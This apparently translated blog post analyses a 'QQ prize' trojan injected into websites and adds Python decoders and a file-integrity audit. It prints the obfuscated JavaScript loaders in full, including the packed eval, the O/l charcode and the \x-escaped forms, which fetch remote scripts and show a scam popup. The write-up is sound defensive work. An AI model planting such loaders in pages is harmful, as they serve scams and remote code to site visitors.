
Ultimate fix for the website "QQ prize" trojan

Web protection · 苏demo

<Script language="javascript">
<!-- eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/0/2.0"></1>\');',12,12,'js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document'.split('|'),0,{})) -->
</Script>

<SCRIPT src="http://www.qqcn2010.com/web/js/dtree.js"></script>

Analysis shows that the link address in the second segment is in fact generated by the eval function in the first segment. As soon as the page loads it pulls in that js file, which then generates a div containing an image and a link:

<div id="eteUnionUpFloat" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 300px; z-index: 10; position: absolute; width: 254px; height: 156px; top: 406px; left: 991px; "><a href="http://124.162.23.178/css/style/tz.asp" target="_blank"><img src="http://124.162.23.178/css/style/qq1.gif" border="0" style="cursor: hand;" width="254" height="156"></a></div>

There is also a background sound that imitates the QQ pop-up notification sound:

<BGSOUND balance=0 src="http://60.191.221.159:10000/win/system.wav" volume=-240>
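To verify the claim above, that the dtree.js tag is produced by the first segment's eval, the packed call can be decoded statically instead of being run. The Python below is an added example written for this page, not code from the post: it re-implements the dictionary substitution that the p,a,c,k,e,d packer's own function performs, and the constructed sample keeps the page's arguments while eliding the packer's function body, since the decoder never executes it.

```python
"""Static unpacker for the eval(function(p,a,c,k,e,d){...}) loader shown above."""
import re

# Constructed sample: the packed call from the injected script, with the packer's function
# body elided because this decoder only reads the arguments that follow it.
PACKED_SAMPLE = (
    "eval(function(p,a,c,k,e,d){/* packer body elided */return p}"
    "('b.a(\\'<9 8=\"7://6.5.4/3/0/2.0\"></1>\\');',12,12,"
    "'js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document'"
    ".split('|'),0,{}))"
)

# Matches the argument list after the packer function: payload p, radix a, token count c
# and the '|'-joined dictionary k.
_ARGS_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)


def _unescape_js_string(s):
    """Resolve the simple backslash escapes that occur inside the packed payload."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def _to_base(n, radix):
    """Python equivalent of JavaScript's Number.toString(radix) for 2 <= radix <= 36."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        n, r = divmod(n, radix)
        out = digits[r] + out
        if n == 0:
            return out


def unpack(source):
    """Return the script the packed eval() would execute, without executing anything."""
    m = _ARGS_RE.search(source)
    if not m:
        raise ValueError("no p,a,c,k,e,d packer call found")
    p = _unescape_js_string(m.group(1))
    radix, count = int(m.group(2)), int(m.group(3))
    words = _unescape_js_string(m.group(4)).split("|")
    # Same table the packer builds: d[c.toString(a)] = k[c] || c.toString(a)
    table = {}
    for i in range(count):
        key = _to_base(i, radix)
        table[key] = words[i] if i < len(words) and words[i] else key
    # The packer then replaces every \b\w+\b token through that table.
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)


def script_sources(decoded):
    """Extract the src= URLs of the <script> tags the decoded loader writes."""
    return re.findall(r"""src=["']([^"']+)["']""", decoded, flags=re.IGNORECASE)


if __name__ == "__main__":
    decoded = unpack(PACKED_SAMPLE)
    print(decoded)
    print(script_sources(decoded))
```

Running it prints the document.write call with the dtree.js URL, i.e. exactly the second segment. The same function decodes the other packer sample further down the page, since only the dictionary differs.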

Security precautions
1. Set permissions: apart from a few special files, make every other file read-only, so the trojan can neither be uploaded nor run;
2. Get into the habit of making backups;
3. Change the program (admin) paths;
4. Make the back-end password as complex as possible;
5. Install protection software on the computer to strengthen site security and reduce the risk of trojan infection;
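Items 1 and 2 above, made checkable. This Python is an added example, not code from the post: it records a SHA-256 baseline of a web root and later reports files that have become writable by group or other, or whose content differs from the baseline, which is how an appended loader tag like the one shown above surfaces. The web root it audits is a constructed temporary directory, and the loader URL in it is a placeholder.

```python
"""Read-only audit plus hash baseline for a web root (precautions 1 and 2)."""
import hashlib
import shutil
import stat
import tempfile
from pathlib import Path


def _files(root):
    """Yield (relative posix path, Path) for every regular file under root, sorted."""
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if path.is_file():
            yield path.relative_to(root).as_posix(), path


def baseline(root):
    """Snapshot every file's SHA-256 so a later injection stands out as a changed digest."""
    return {rel: hashlib.sha256(path.read_bytes()).hexdigest() for rel, path in _files(root)}


def audit(root, known_good, writable_allowed=()):
    """Report files the server process could modify and files that differ from the baseline.

    writable_allowed lists the few paths (upload dirs, caches) that legitimately need writing.
    """
    findings = []
    seen = set()
    for rel, path in _files(root):
        seen.add(rel)
        mode = path.stat().st_mode
        if rel not in writable_allowed and mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, "writable by group/other"))
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        if rel not in known_good:
            findings.append((rel, "not in baseline"))
        elif known_good[rel] != digest:
            findings.append((rel, "modified since baseline"))
    for rel in sorted(set(known_good) - seen):
        findings.append((rel, "missing"))
    return sorted(findings)


def demo():
    """Constructed web root: audit once clean, then after a simulated injection."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    try:
        (root / "index.html").write_text("<html><body>hello</body></html>")
        (root / "uploads").mkdir()
        (root / "uploads" / "readme.txt").write_text("uploads live here")
        for p in (root / "index.html", root / "uploads" / "readme.txt"):
            p.chmod(0o444)  # precaution 1: read-only
        known_good = baseline(root)  # precaution 2: a known-good copy to compare against
        before = audit(root, known_good)
        # Simulate what the post describes: a loader tag appended to a page (placeholder
        # host, not a real indicator) and a file whose mode has been loosened.
        (root / "index.html").chmod(0o644)
        with open(root / "index.html", "a") as fh:
            fh.write('<SCRIPT src="http://loader.example.invalid/dtree.js"></script>')
        (root / "uploads" / "readme.txt").chmod(0o666)
        after = audit(root, known_good)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return before, after


if __name__ == "__main__":
    clean, infected = demo()
    print("clean run:", clean)
    print("after injection:", infected)
```

On a real site the baseline would be taken from a backup copy and stored off the web server; the group/other write check is a proxy for "the web server process cannot write here" and should be adapted to the account the server actually runs as.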

PS: this trojan has recently upgraded itself to a form whose variable names are built from O and l so that they look like binary digits. As follows:
OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(""+O(99005434)+O(109891017)+O(98017879)+O(115835235)+O(107918387)+O(99992910)+O(108905601)+O(114841149)+O(45549578)+O(117816923)+O(112864240)+O(103954969)+O(114849803)+O(99990869)+O(31687465)+O(39604343)+O(38611951)+O(59403806)+O(82178168)+O(66338164)+O(81184638)+O(72271089)+O(79206874)+O(83168778)+O(31689655)+O(113855151)+O(112864408)+O(98010957)+O(60390619)+O(33661487)+O(102962358)+O(114844131)+O(114849439)+O(110883355)+O(57429223)+O(46539706)+O(46539243)+O(117817991)+O(117812355)+O(117811069)+O(45547270)+O(101971757)+O(109895803)+O(109899861)+O(101978895)+O(106921583)+O(99991986)+O(96038462)+O(99004447)+O(113855296)+O(106920770)+O(45545277)+O(98013739)+O(109893993)+O(107912961)+O(46536367)+O(113859368)+O(110885479)+O(98016483)+O(109894258)+O(99008746)+O(99998977)+O(46532597)+O(98012335)+O(110886532)+O(45547812)+O(104946386)+O(113851133)+O(33663712)+O(61388571)+O(59400430)+O(46531067)+O(113856900)+O(98012363)+O(112863124)+O(103954630)+O(110881606)+O(114846249)+O(61383383)+O(38619969)+O(40596203)+O(58410619));
360 antivirus detects it automatically. Learn to recognise it.

Other common forms are as follows:
<Script language="javascript">
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/2.1"></0>\');',12,12,'script|js|cp|spcode|com|googleadsl|www|http|src|SCRIPT|write|document'.split('|'),0,{}))
-->
</Script>

or

<Script language="javascript">
<!--
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x63\x70\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
-->
</Script>
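The O/l variant and the \x-escaped variant above decode the same way, statically, and both turn out to write the same loader tag. The Python below is an added example, not code from the post: stages 1 and 2 of the O/l sample are copied from the page (with the extraction quotes repaired), while the third eval(""+O(...)...) chain is constructed here with the arithmetic the sample uses, Math.floor(m/10000)/99, rather than copied in full. The decoder recovers those two constants from stage 2 itself, so it is not tied to them, and the \xNN sample is the page's own.

```python
"""Static decoder for the O/l charcode-built and \\x-escaped variants of the injected loader."""
import re

# Stages 1 and 2 of the O/l sample, as on the page: lookalike variables are concatenated into
# `l = String.fromCharCode`, then l(n) calls spell out the real decoder function O.
OL_PRELUDE = (
    'OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";'
    'OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";'
    'eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);'
    'eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)'
    '+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)'
    '+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)'
    '+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)'
    '+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)'
    '+l(57)+l(57)+l(41)+l(59)+l(125));'
)
# Stage 3 is constructed, not copied: same arithmetic as the page's sample
# (code * 99 * 10000 plus junk below 10000), encoding the loader the hex variant also writes.
_LOADER = 'document.write(\'<SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>\');'
OL_SAMPLE = OL_PRELUDE + 'eval(""+' + "+".join(
    "O(%d)" % (ord(ch) * 99 * 10000 + (i * 37) % 10000) for i, ch in enumerate(_LOADER)
) + ");"

# The \xNN variant, as on the page.
HEX_SAMPLE = (
    r'window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] '
    r"('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f"
    r"\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73"
    r"\x70\x63\x6f\x64\x65\x2f\x63\x70\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70"
    r"\x74\x3e');"
)


def _assignments(source):
    """Collect NAME="literal" assignments, i.e. the O/l lookalike variables."""
    return dict(re.findall(r'([A-Za-z_$][\w$]*)="([^"]*)"', source))


def _call_chain(source, fn):
    """Integer arguments of the first eval(fn(n)+fn(n)+...) chain built on helper fn."""
    m = re.search(r'eval\((?:""\+)?((?:%s\(\d+\)\+?)+)\)' % re.escape(fn), source)
    if not m:
        raise ValueError("no %s() chain found" % fn)
    return [int(n) for n in re.findall(r"\((\d+)\)", m.group(1))]


def decode_ol_form(source):
    """Recover the stage-3 payload without executing any of the three eval() calls."""
    names = _assignments(source)
    first = re.search(r"eval\(((?:[\w$]+\+?)+)\);", source)
    if not first:
        raise ValueError("no variable-concatenation eval() found")
    stage1 = "".join(names.get(v, v) for v in first.group(1).split("+"))
    helper = re.match(r"var (\w+) = function\(x\)\{return String\.fromCharCode\(x\)\}", stage1)
    if not helper:
        raise ValueError("unexpected stage-1 helper: " + stage1)
    stage2 = "".join(chr(n) for n in _call_chain(source, helper.group(1)))
    spec = re.match(
        r"(\w+)=function\(m\)\{return String\.fromCharCode\(Math\.floor\(m/(\d+)\)/(\d+)\);\}",
        stage2,
    )
    if not spec:
        raise ValueError("unexpected stage-2 decoder: " + stage2)
    fn, div1, div2 = spec.group(1), int(spec.group(2)), int(spec.group(3))
    # String.fromCharCode truncates its argument, so integer division reproduces it exactly.
    return "".join(chr((n // div1) // div2) for n in _call_chain(source, fn))


def decode_hex_form(source):
    """Resolve \\xNN escapes so window["document"]["write"](...) reads in clear."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), source)


def recover_sources(source):
    """Pick the decoder by obfuscation signature and return the script URLs it would load."""
    if re.search(r'eval\((?:""\+)?\w+\(\d+\)\+\w+\(\d+\)', source):
        decoded = decode_ol_form(source)
    elif re.search(r"\\x[0-9a-fA-F]{2}", source):
        decoded = decode_hex_form(source)
    else:
        return []
    return re.findall(r"""src=["']([^"']+)["']""", decoded, flags=re.IGNORECASE)


if __name__ == "__main__":
    print(decode_ol_form(OL_SAMPLE))
    print(decode_hex_form(HEX_SAMPLE))
```

Both decoders print the same document.write call, which is the point worth checking when cleaning a site: however the loader is dressed up, the URL it injects is what to block and search for in every page.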


Reprints must credit: 苏demo的别样人生 » Ultimate fix for the website "QQ prize" trojan
